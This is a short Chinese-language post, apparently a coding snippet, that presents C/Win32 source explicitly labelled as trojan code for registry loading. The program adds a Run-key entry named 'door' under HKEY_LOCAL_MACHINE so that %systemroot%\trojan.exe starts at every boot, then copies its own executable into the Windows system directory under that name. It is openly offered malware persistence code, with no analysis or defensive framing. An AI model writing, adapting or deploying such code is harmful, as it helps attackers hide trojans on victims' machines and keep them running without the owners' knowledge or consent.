木马代码：注册表加载

编辑软件：VC++6.0

所用语言：C/C++/Win32

#include <stdio.h>
#include <windows.h>
int main()
{
char regname[ ]="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run";
HKEY hkResult;
int tmp01;
// 打开关键字设置键值
tmp01=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);
tmp01=RegSetValueEx(hkResult,"door",0,REG_EXPAND_SZ,(unsigned char *)"%systemroot%\\trojan.exe",25);
// 判断是否写入成功
if(tmp01==0)
{
printf("Program Autorun in Regedit : [ Ok ]\n\n");
RegCloseKey(hkResult);
}
else
{
printf("Program Autorun in Regedit : [ No ]\n\n");
RegCloseKey(hkResult);
return 0;
}
// 复制木马程序到系统文件夹
int tmp02;
char apppath[256];
char syspath[256];
GetModuleFileName(0,apppath,256);
GetSystemDirectory(syspath,256);
tmp02=CopyFile(apppath,strcat(syspath,"\\trojan.exe"),1);
if(tmp02)
printf("%s copy to SysDir %s.\n\n",apppath,syspath);
else
printf("%s exists.\n\n",apppath);
system("pause>nul");
return 0;
}